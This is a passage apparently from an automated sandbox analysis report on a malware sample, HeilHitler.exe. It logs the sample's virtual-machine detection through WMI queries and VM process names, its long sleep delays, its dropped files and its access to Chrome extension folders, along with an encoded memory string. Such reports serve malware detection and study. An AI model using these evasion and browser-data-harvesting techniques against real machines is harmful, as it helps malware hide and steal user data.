              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8671Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 745Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8440Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 891Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1103
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3163
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1576
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4772
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1408
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4300
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1346
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3813
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 409
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2502
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1692
              Source: C:\Users\user\Desktop\HeilHitler.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\python310.dllJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74322\_sqlite3.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.dllJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17221
              Source: C:\Users\user\Desktop\HeilHitler.exeAPI coverage: 4.8 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep count: 8671 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep count: 745 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep count: 8440 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep count: 891 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1136Thread sleep count: 1103 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5416Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2332Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep count: 3163 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -10145709240540247s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep count: 1576 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep count: 4772 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep count: 1408 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2044Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep count: 4300 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep count: 1346 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2108Thread sleep count: 3813 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep count: 409 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep count: 2502 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep count: 1692 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF633D683C0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D69280 FindFirstFileExW,FindClose,0_2_00007FF633D69280
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF633D81874
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D69280 FindFirstFileExW,FindClose,1_2_00007FF633D69280
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF633D683C0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF633D81874
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF43229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,1_2_00007FFDFAF43229
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C246EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,68_2_00007FF702C246EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C1E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,68_2_00007FF702C1E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C688E0 FindFirstFileExA,68_2_00007FF702C688E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: getmac.exe, 00000032.00000003.1796167702.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796590383.000001B102B26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"t
              Source: getmac.exe, 00000032.00000003.1796167702.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796590383.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000002.1797516365.000001B102B32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: HeilHitler.exe, 00000001.00000003.1690107699.000001BD43542000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "RAOEgDBIgAI8PHBoQAKEADB4QAMEgGBIRAKIgBAAAA0MHAAQQQAAQAdLHAAAQLyBAAAwicAAAAsI3c05WZ052bjhg2AAAA/LXZslmRul2ZvxWCajGdhB1YpBXZIoFAAEw+yBAABoicGkCAAAQWyBAABItclVmc0lHcvNGCaDAAB4gcAAQANIHAAEQryBAABwgckFWZyRg2AAQAeIHAAAQ7yBAAAgmcAAAALJHAAEQwyBAAAUpcAAAAnJHAAAgSyBAAAAkcAAAA/IHAAAgIyBAAAYgcUkyav9FdzlGel91cylGZNodApCAABogcU1VZNJXZi1WZtVmUbxgep5WauM3ZulGd0V2UyV2cVVWbhdEF6BAAAkvcnlmZu92QGoFZlZXYTVgWyVGaj5Wdhx0cl1WYHNWawVUEaBAABkmcjlGcFRgWAAQA1Lnbvl2czV2cgMWawVEIn5WasFWZ0NVF65kDpAwUAQGATBAZAMFAkBwUAQGA3BwUAQGAZBQAAEAAB8YeTQHAEAwUAQGAXJxXAw3CkBQAD0YDktAZBwnA8FhaPQnWxBQACEqAhSAfBwnBgWgaEQnAhSAfCwnBgWgaEQHEg+Ad3JXAhKQoEwnA8ZAoFoGB0pAoFoGB0RQfd0FAEFQoCwnDgSAdAEgANyAZLQWA81gaEQHO6ZpcAYXB8pAZAEAAZBQAAEAABEwdENHAxggbAEwADCABAQAAkBwVF0HAhyAoEwHB9xwjBM4A8tAdUKXAhOAfKAaBqRAdD0nAhmAZCwnBgWgaEQnkyFQoCwXCgWgaEQnA9VQoIQ2BkZAZFQWAhSAZIAKB0ZAoFoGB0FQfDE6AkJAZHoGA8ZAoFoGB0BQABEaAkNAoCQHkyFgaAQHAAEAMzBAAAMEAAAACAAAAGAAAAAAAAAAAAAAABMWYpB3b0d3bydEbhVGdT5iclJmYhJ3Rr5WYsJ0G6RBCrTw/iEADBYxCKgvA/LQAOEADBoQAWEgDBYRAEEABBIQAMEgDCARAMEgECYSAKIgBAAAAyMHAAQwJAAQAeLHAAAQLyBAAAwicAAAAsIHAAAw/yhGdhB1bUVmdhN3XLoNa0FGUlxWaGRXZnJXY05gWAAAAnJHAAAQmyVGbwlGdsVXbIoNAAEw+yNncpRWYpB3b0d3bydWDaBAABoicJkCAAEAIyBAAB4hcAAQAqLHAAAQWyBAABQtcAAQAOIHAAEQDyBAABwgcAAAAtLXZ0Fmcl1WduVWCaDAAAsqcAAQABLHAAAQlyBAAAcmcAAAAKJHAAEAAyBAAA4lcAAQAhKHAAAAQyBAAA8jcAAAAiIHAAAgByZRKzVGbpZ2byBFI05WZyVmZmlGZg4WagQXdwBSZyFGItVGa0BiZvBCajFWZgI3bmByclxWamBSZoRHIvNHIsQmb19mZgUmchBycu9Wa0FGbsFGdz5WagEWaw9Gd39mcHBSZsBXa0xWdNdmeAAQAcIHd4RnLvZmbJhg+AAQAKIHVkVCIlxWam9mcQpg+0FGZuUmdhNHC6BAAAsmcAAQA1LXYpB3b0d3bydUCaBAABUocAAABsAAAAkmcAAAAtIHAAAALyBAAAwic2Fg2AAAAkJnApCAAAUvcAAAAeJnApCAAAwicAMlAxJQkBEaA8FAoAQXA9dQXAwHAnBAAAYx8AAAATBAAAUAAAAgAAAAAAAAAAAAAAAQAj5Dct92Y0NXasxjL+MHbhN2bsxjLhlGcvR3dvJ3RsFWZ0NlLyVmYiFmcHtmbhxmQvoHAgAAAAIw8AAABsAAAAkmcAAAAtIHAAAALyBAAAwicAAAAjJHAAEwByBAAAcmcAAAAKJ3ApCAAA8mcAMlAxJQkBEaA8JAoBoGA0JgcBUHAkFAfB0HDdBAfAcGAAAAIzDAAAMFAAAQBAAAACAAAAAAAAAAAAAAABMmbvl2czV2cgEWaw9Gd39mcHByZulGbhVGdTpheO9QKAMFAkBwUAQGATBAZAMFAkBQAAkFABAQAAEQA3V5cAEDATBAZAEwADCABAQAAkBwVAEQAh6AZVAKC8hQfO8oAD2AZCEKDkJAfJAKCqdAdUQHoyFhaAwnnyNAfuEHA35ScAkFABEQoHw3Eg+AdAEAABAQAzlnE0BABuEHAXFxXAwnCkBQACEqAhiAZHwXCgigaHQnB8BBoPQHABIQjLQmCkdAfOo2B0dQfCEKAWAwFHQGB8lAZCwXCgigaHQ3TyNAfH0nA8Zie0JXAhaAfNAKCqdAdG0nAhiAZFwXCgigaHQXB9RQfCwlRdBARBMYA8xAdD0HBrdAZBMYA8tAdC03AhWAZGQmCqBAfJAKCqdAdB0XAiGwgBMIAEFwgAQUAhWAZGAaB0BAhDQGBkBAhDQmAkRAdAcGABEQoBQ2AgKAdcKXAqBAdAAQAENHAAAwQAAAAJAAAAkAAAAAAAAAAAAAAAEwY0ZWYyNWZulWTsFWZ0NlLyVmYiFmcHtmbhxmQbonFEkOB7Lw/CEABBwQASEAIBgRACEADRAh8GEgDB4QAOEAEBARAOEgDBARAQEAEB4QAOEgEC4QAKEgCBIRAKIgBAAAAANHAAQgBAAQAcLHAAAQLyBAAAwicAAAAsIHAAAwZyBAAAYsczhGdhBFdmFmcjVmbp1mDadmbp1WYvJ3BaVGbpZ2byBlclNXdLoFa0FGUvRVZ2F2cKoNAAEgKydQKAAAAZJHAAEgyyBAABggcAAQAOIHAAEQDyBAABwgcAAAAtLHAAEAoyBAAAskcAAQABLHAAAQlyBAAAcmcAAAAKJHAAAAQyBAAA8jcAAAAiIHAAAgByFRKAAAArJHAAEgCyRlbvlGbkFmQHoFAAEg+y1WdpRWYsFGUIoVK05WZ05WSoASZzlmUNoHAAEQ+yVmcvR3UgQnZvN3byNWaN9gezJXZrFWZyJEdhVGaD1gWAAQA4LHAAEw9yJ3blRXZNZgWyVGa0FWZGdgWyVGaj5WdhxEVJolch5WdMVgW05WZ05WSGolDpQnbllGbD
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: getmac.exe, 00000032.00000003.1796493147.000001B102B50000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1795863967.000001B102B52000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000002.1797516365.000001B102B50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: getmac.exe, 00000032.00000003.1796167702.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796590383.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796493147.000001B102B50000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796004329.000001B102B4D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000002.1797516365.000001B102B50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: getmac.exe, 00000032.00000003.1796167702.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796590383.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000002.1797516365.000001B102B32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWK0
